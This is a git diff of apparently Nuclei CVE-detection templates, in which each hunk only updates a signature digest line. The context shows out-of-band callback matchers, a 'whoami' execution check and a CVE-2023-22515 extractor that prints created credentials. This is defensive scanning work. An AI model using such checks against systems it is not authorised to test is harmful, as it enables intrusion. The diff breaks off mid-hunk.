b/http/cves/2022/CVE-2022-48012.yaml index 6dc72856be..a95ecb8ced 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -58,4 +58,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 490a00463044022007b44ea4a13dae7e36848180fb7fabc80a68aa184664357712392ace77f407020220282032af57d8f021333f3c51dec5920fd7fb12c54d6a44a5c764ea12bc275502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022051bf7514694de8c15b38303d40390063ef2e520503767afd105126c0b20e1090022007526951bb98b9e8af545d741f3e95517f6932b106b84ffbcda79c53600dd610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 7668f6cd5a..2749258a25 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d04ced5ba0c4a1ead607d2759900e2f98b0f90ec3fcc45243650dc4f3d072afc02203113a7fc6d68c59429fd448a03c3ff629e54408c1026d776db300c86b9951ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204717ceff6e4b8317c92beec73e08121ddfc702c2c44984057dcb26997639e4af02201d60a9783cc7342222ea9e9810896abbf2c293eb8d4350a0715ca2c8b873bc56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index c47ec3e49e..734ebe36df 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d24028d90f855321d541394c206888ac3de32ddc95fd192f2cea84c3ce106573022100b06dfd2c7fe33e022d5bc25a563682c01a13c1ca7e839fe8ebbf28f79406baa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001e71051c885b3bea2cba01983b29a1cc0c0d689cfcc4eb2506922805f31329d02200cb52bba1c8d1a09bb9e2aad7af4f0e949edf813254513232bd0bbd0d6ffdd4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index f21057eec9..0b0b3e7f84 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -71,4 +71,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a004730450220400e7b76f4f4cf9870346fb29d8e654df2167790ed2d76301b8ba004db9ee11e022100be4e3edb0589d0c55d0484bf513363e3876baa53bd6c2a2fef65f79df30ae768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f42a22f61252e2e216b2da0de6ff006679e83223f67f0e46f3a67d89c42ca0b0221008addfe626672d575e4b1b69d460c06b3c03d2f4c37b7e1935016e81164341778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index ade7803908..94ef52e462 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100e4c92d573b28770ca839e68e2b68d7a30ec2af40ff4abc64d9f4629681c70379022100c28548dd16e73ddb8f66ab1af4f4573c78c0681294fefe2136fcaa8f9b9ef758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220648bf29359218c50ca1e8a6a9165e91f5e5b955e3a3e299dd9198dcd13298c5d02210082f9f193883c0050df48f43afcf3d87d19b402ca3383a50b25d4220ae6d7afdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index 19a95204fc..a414fb7715 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -37,4 +37,4 @@ http: - 'contains_all(body, "Array", "[subnet]", "[description]")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100f9d5744f5ea518c0c15f7e8ae02484ba248121b2bb5f85fe63f693fc4a5968a602206e2279d5e1a12053e341f2e6f08fc0e01edee04ee85bd9a2a558592614c9a52c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae3eb27ee42b1bd16ba33cb6273e40a49c8263f01a9e43ac4e1e7b1b52df573f022100cd5c5da0014f77263c958d8b1dcce1a9bded0400c5419d09c5e220f7034cbf30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index 8788837e19..b96e563739 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -73,4 +73,4 @@ http: group: 1 regex: - csrftoken=([A-Za-z0-9]+) -# digest: 4b0a004830460221008110d9c9ede7516bdf06f10bfcc9c5d842dac83bf1bf95a8ac2f6395b48f72c1022100c305294bead6b092ee60ac6b327382276c3dfbadacec79c73824950d065ca87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008f4d403a114f7b2ed86ddbb876e36c810ef957e29491d4f758a393ad4713a13022100a394ab052e8b43e15775b95ae9617e8470194068de5dfa37fe3bca5489a26213:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 85ab8c4fd4..1bd42866dd 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "Index of /fp-content")' condition: and -# digest: 4a0a0047304502206ac68e76b7d1b80590fce76a7c334d02683e8f5685f3f00ca00d482a705fca06022100a542a7ce222beaa5b850215fc76bce92f218fda6a243cf87ddd630934f1c2d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db682eec34f039c688db1490fcf17d3112ed30b94102b59812a06414755967be022100c9e09a6bf3938aa2d82f3304cdab4f644920d1bfe4ed6e6597de88d981d3ce1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 4db58c6c19..16dbfc834f 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -72,4 +72,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 490a00463044022056f9bdb16ccb00b5dd4fa12e9eba4ca7d7e939c843f667b4581165ca69a847f202200e0f376f456a995535eaf668ed23e5d6128f81e7cde97308346a4aea04bef498:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dcbb9338dfe6815edc5f3861b9400694a3e6a15e9f05849e50999350adc1d89022100fcbcc2630cd5421b32f738673f309bbe31177c93276414917481daa7205c9135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 0c58956481..546757e41c 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -46,4 +46,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 490a00463044022030093375e39a5d0e186176cbda26b99b4f2d9b98da7caf82f840983068846982022050711347eca3508bdbc51f4e2785386976f7c0c935a3a2a1f0651f6806dc8019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207126aeef57e0efff83e68ab84bc4ccccd23eaea0cb7e84292e9a5c33d18eebec022057e37529a1ecff2ef87f5a59326c55cee28aa40be463253ca558ed5e6270e9df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 0eab7607b8..a1c4891416 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -60,4 +60,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a004630440220072b65d71510b1634861b941e61475482be1ba0838781257678f74617cbb62b702202d1edc88fa42eea9bfacbaee660087313a77e0dfb93cd9d2198a1198cfc173d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008621e6fc19234e974d3b243fc784b9fc10e4fb849bc846258bb7a3f94d3524a80220303b2f3b771c041e111c4eebbb296b758f819b74a66b3b5c1ddf8ccbe777372e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 419ab84b3e..d5d6251d53 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009328b8cfdfa07c19005e8c785f33971030b1e69f80497f0678af09446cff35b7022044197fa263ddc6abed937608a3484fad2d8e6dc30f37abe7d0c5b1d5b669fae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ae6e2609e538982731a77fbf019008a57b2265608410bec3b93b14da9f21331022100a9b5e770cc685099840f3ee0bde062597d9fd29da778c962f4ad38cf75bd6f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index dcc48437a5..9fd2f54258 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220038ee01fa9935d03a32a3a7470cca7c217ac7b63f63a30c0af062298fc4dfb2602206e8e49ba9bb685d8b9d999dae8c61a2f6b2ebc1eaddaa14d1efea7fc06364779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d02b34971e2f1e10fe09f6ac41b7d29334c9f69e1e488739b3711803ec615be0221008694e2d730b3d526a4bc14049eec9ec828e26cd4147d26b97966da12cd6f6d44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 8dddac099d..122c6d140b 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 4a0a00473045022045f3a95c176c2addf7bb4c7bb971f457459a9df823820444024086732be71dbd0221008825780a2ce7eaa87319fb76035339a15ec592a9d62c12f41f8a8b6be8776d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c1a3a2ff75345251556846a6dee0fed1f56cb7cff2a43d35a6cc9c567095086022046e095603a56f2b986e6f7d8537a791d13a750a4bc45c818f9733f5b9473d9df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 56a36e9398..aad76757e8 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c298fb5462949d2c0b4c37fe2b6f43a82cf04f52f0d463d2683e836bb1d02b2022100d3a58d90f4dead648a4149fffad2b4862828a2de55ca75a95ad4cf78b4ae40f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c2a6ce19ce9eb45cb04276522c9693a728388d417553ced77f30ec12ee9417e0221008dc88eae939ce4665bddcc9538ed6c18aa62054a7a768682d3b491b264114bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index a6ec59a4d1..98cedd3f3f 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -82,4 +82,4 @@ http: part: body_3 words: - "{{html_comment}}" -# digest: 490a0046304402200ecacf409865531df27981f30bbbeb4ea2c9feacbcb8c957049c6b37b2f6e08d02205f9b37f3cc2bd352168298cd1775310eb1fb0ee10efe1c5f210b6b41b7b603e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d78f448652ff480069cb03b1f78fb30af1a9ca0de10eecd5f19fbfaaa56bb5e0022100f8786009ae87cd3ba31b6cf55149153420a85aa9d61b51abf28cd80fc099fb9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 941fecda57..1d9f84e7c8 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b78b70e35d7ae097b09444766c14d99558d97b9a988c68a33b2ef51f72d18bd0221009ed5a6d532cd23a04171350e21b4c0a4a8da0f3519b0a3c50468f0cd49521398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d0c6e100044fdde3998231bae6f6cbe3bec52a4aba56ad08ce532b7ed60d51602200d13686fedd840e2d62e31cc95af0a1deaf172631bd8b39d815cfe7e497a8a9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 20000ecb37..d2d36d9a11 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -67,4 +67,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 490a004630440220217a4161f5d33b558b5e1a5f9cc3022399c2917d68142b7efd0cbc2bef5b9416022021067a8d5837587fcb3fd09cd0f9a8687351646f3756e6dc7b47e1093c686c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4ea8611e5fbfefbfc93aeb709594cb1c4910d380bb601f437c6a7c326662f6f02203e5f2a223540ba51e701c51b48de8e16b091ee2dddfeb4a85ffb2efe8c645560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 5f0a0b6967..6cd4ba8e0e 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220078674432fdbe4bcc3e9ae1cfbf13e4a96cf8e8a8c453600e3aff2da336e476e022100a0b4931ccdeaef487fa74cef44cd586f54177eb42f22c5344d688b35a272fc15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e864773eddb8c8ec09b5cd29b83fd3f6e6fc6e287d43eae34fd5cdb84d72582022100c46384f56ddceb399e236f6c57c228570f822d585c50acde1b2f9a82770c10cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index ae1166a8b4..372165ca29 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -74,4 +74,4 @@ http: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true part: body -# digest: 4a0a00473045022004659117a94dd175c3f64942542c9f5c70bd990758add2155a9a819489465fb8022100dabf13a217b43a0cc4c1e51d04df3d0a23ea6c8acdf50ea4f6d42e386d13c7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba20a54a3a432df111348f25e911ec92d24abda137079f61775ecb964fa283eb022067d7d3b2b7c8063c4a7317c97ed7d3112d37e62ade88166e98f93e8d84ec5522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 598dd8dc5f..3adf958c8d 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -95,4 +95,4 @@ http: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body -# digest: 490a00463044022055b10fc56ee43cdb8ca9c694251abb76a7705cdcbede4f4f70fdcf5571f7a5b502201c3ab21258337ff42f17b2eefe0b93936df34bf1675d361b0c5d3e3f634bf301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cc967f4799e1f52f790f398c5f0b0a947724d461556ccc1708d0cb829adac397022018b0efe5f3c5116e10afaa6b1d72e44f5d01446a662bbd438ef71d8324b1fd5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index edc17ca988..e13e15b717 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f2592d7f4a8f1ad6d2b193ebd92421aa8ce79cced2f737da59684c8d24fb431022100ea7fc81dac4971b7982afcaf1ee0f57bb291278076a22670eb8cc511b40fbe2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d33658fadb0c3b76af58bde6da9db8df7fb5aaa693f34c25111a6a7599092d93022074ca5a695e763d3b2e8d2ccd96f1a2005c6400c8ffed5d784e9d494b2d71fcb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 1df233b19f..d93861793a 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220653e5fe2976692c3c881761bdc58112c952b2c144074c8042a66f4521467dfc00221008236c69d7bbe67c34bed553ea0870b8f1419031871e38a1644213017c0949d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7d83db7d46a24d08eec0c032ad6c29a7a7494a213f3e776a07822b39ec60d36022100a8f268ac9f2e5148f379aca1009ae0eef306dbf32483549bf1e6a945f901514b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 1cdad88f18..f0d3e27a0e 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -82,4 +82,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220426a8d82659122f39b1e0704f4854f0d4f6b4f2567d07705a37749887bcebf6b022100f6e1952745c3cec3bf7f8248f1c0fa04d58a0aab1fd86e65cab496dc4dfac1dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202265c5fa40bded52f5e8d2130f2d27af861da734d28cd2a5338de7112287ae1d022100aafd34d4cce0c6a2038766f4773177ea1a95d3e6c7420e202620ebe1e99e90fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 9167352c27..1ab9823e18 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2dc7521c04ad3d5386510be4e09f0631e6d709fe85d9489449847ade8f7e892022100b6256d0260f230a9a6fe5d4ea8c10a629218c2b7eb52ac89a9bcf4406692980c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100841f75f7adf2389cf7a570922f44d7110997635e8309b7f0425d409e109c43cf022100827826a9ea50e2a08cd006fdcb484b4b19ec720844111041640be6e0c75717fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 48e7e63787..9a813a2ba7 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220253eb38bfa15b32b565d0d52729a0d49290b60292a800854d9f767c96b77ab7b022058b19983a77756f40936f9dbf16bce4b071ab4a0eb65d5832c1dbac9b819bf0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f523e1f7b686395863572e0b76d481b4d2183ad5758e83adb8e721ce0214aa3702210086811079cc91bc1fda244f017f919e17786b27c27a78da59c9757fadb6024e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index caee265680..05ae449ee4 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -82,4 +82,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' -# digest: 490a0046304402205c2e72b3a46b67fa6502325f5c5bc179706e5ce1e349454522f1e336215dc27b02204a79690ff8837f5737d444a08704269bfa1db14661d196aecec6ca17238ff13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a9d0795ba62637f47dc6d02cc1c50e32fe11f86f71f2c150516a195a769511b02207a5e7c145c4540a48e68f58facda04702d6fedcbbaf4ce1356b42bd67cec5cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index d94e80ae1e..021d4f6ca0 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -61,4 +61,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 490a00463044022021d971dc8fe578f1e5f5ce2badbea31b706f6b7e2381821e537412885b0b92b402201de72236af715dca5a31bf2584f4c350a1bffefdcd3b6b9c06ed2310c47c52bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c195f24c467633a655a09478290444a51a6013d76400aed9493de7194bf9a9f9022100a2d098705275126161b0838e780fcda164c7be37e521c776868fab2645fc7c0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 29498da1ba..e3c5432846 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044021f2decf34789a5809be2140d5c00a0c4197394a365b52d684aa03652b9274511022100e57b85ad71d947a8fcd9a3c2caff691db97c565be9493fbcdea1969241dabb92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c337ce3ced7650a1c24425481fccaa77c8acf66283da5f411e016027e99ff6302205842cc4a2f064fefdd242fc3f2ea0465de309982a6b60fc5097484163c47b3dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 70ac355b82..b9515cb817 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -52,4 +52,4 @@ http: - type: dsl dsl: - x_vuln_check # prints the output of whoami -# digest: 4b0a00483046022100bc1071e5e566ae86e5182333bd3d7a6c8ae42216e60b42a51f6d0caf6d4b563f022100efb619a364faf3da600dd66d185b85d4c528abb80303ba80338a9c8c51b4a672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa6c35d659a974b6867c95930ac86f66793ea4d356020f683caf9a3d230b537022100e3945d678c3fd19fc638795f92994422bb73daa19901590a03760bf937f7b73e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index 7f35da627f..53899c9c47 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -75,4 +75,4 @@ http: regex: - '"sessionid": "([a-z0-9]+)"' internal: true -# digest: 490a0046304402203539abafafbf0bca15ce3302802af0f0456908310129b09f231f8712a23da38b02206a15655120ce0acb4c72c179916a9a2b01677792f5d88b73f3299b05fb4ffb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005e917854de14505ee6a5e3560d7d1a8618149cb2074378f2b420bcd9ef629e7022100a7404d0a575179049ed915c41286482d0d6d965629ca16b5eba4341b6f9950c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 68a638d125..0b4f764200 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8fade8a9a8fefd9bbec8924947c2381ced72d0aa735a8a0d52f6556249f7a67022100cd34d8ad4cb2d735c5cfbc8a38d0d054dd5c95a9d3f8512127ac85d535ea7ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba36b5271817f0459fb098fdd2c1a7550576e5914b44eebba4653e2ce6d5ac19022100c4a84f9e130aa98528b5b5a9a00c09f8bb14967362d704318e1810971defb594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 1d49f2caee..ff47a14973 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100891756170ebb7d1c8fc3b2cea372a6b589d3582e1c83e28fbfd495196c4ad765022100c4cf50470f6f470682a20372817779dd9f94f25c2a451986a4189fe3a8a2a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d7208d5230ec463f1ea5043d8ba95a0a0085662a9af3eb4642b4bedb565306f0022100c7442bc3c595a32bbadf5ab28025e4022ce0664213b14b32d26e347957f76fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 0aa91d64dd..733368f126 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c57b83498f88294e948cfa0e482499061ced121949be027b7a730ddcaf61100022066dcd5b777f3b89c82652d0780d0f4c11be38a15a61de976da7d10375deb3e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fd301a49f781f20f79d27691a17df28fa811e791487a27f5f9a01786667c31c022001ba5c53e062dc8f144f958b19d7064d2f69ad1d9b92d0aa426ca44268bc153c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index cd717fa4b3..65da6cedf3 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -75,4 +75,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a004830460221008e337edd5fc7cd4ffe717d48ac5217c2c11ffc2aef83df2bd066df168ee4cd410221009a00492b8a190c833bf7e77a791a5735edbce79ec4ee0257d9d2ddb300f32221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f0a21f7d206dec98e8f87565781a99fedda197d776617f6d266fe245242061f022100ff34925e4f91bb9951803355f009dfc63d5d727adc5652223c2a61d58e324df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 2e8636f622..49651092c8 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220365ee0f73788da3e66ee9797c957e719253f33c9506e0d7c2c89d97726f8e8340220026a8ffab7377814fb519871b7eb68dc65593207bf22d27c3a7870aa89c309f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df5014285170b4931b6df8e224338d5011d418d459a25aeb3739ab76a2a0fad202210096c6acc2b6b03656446755259bc48f78318ce3d39b62b3f77e81be135fe156a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index fd454bc548..b06bf94b42 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 303 -# 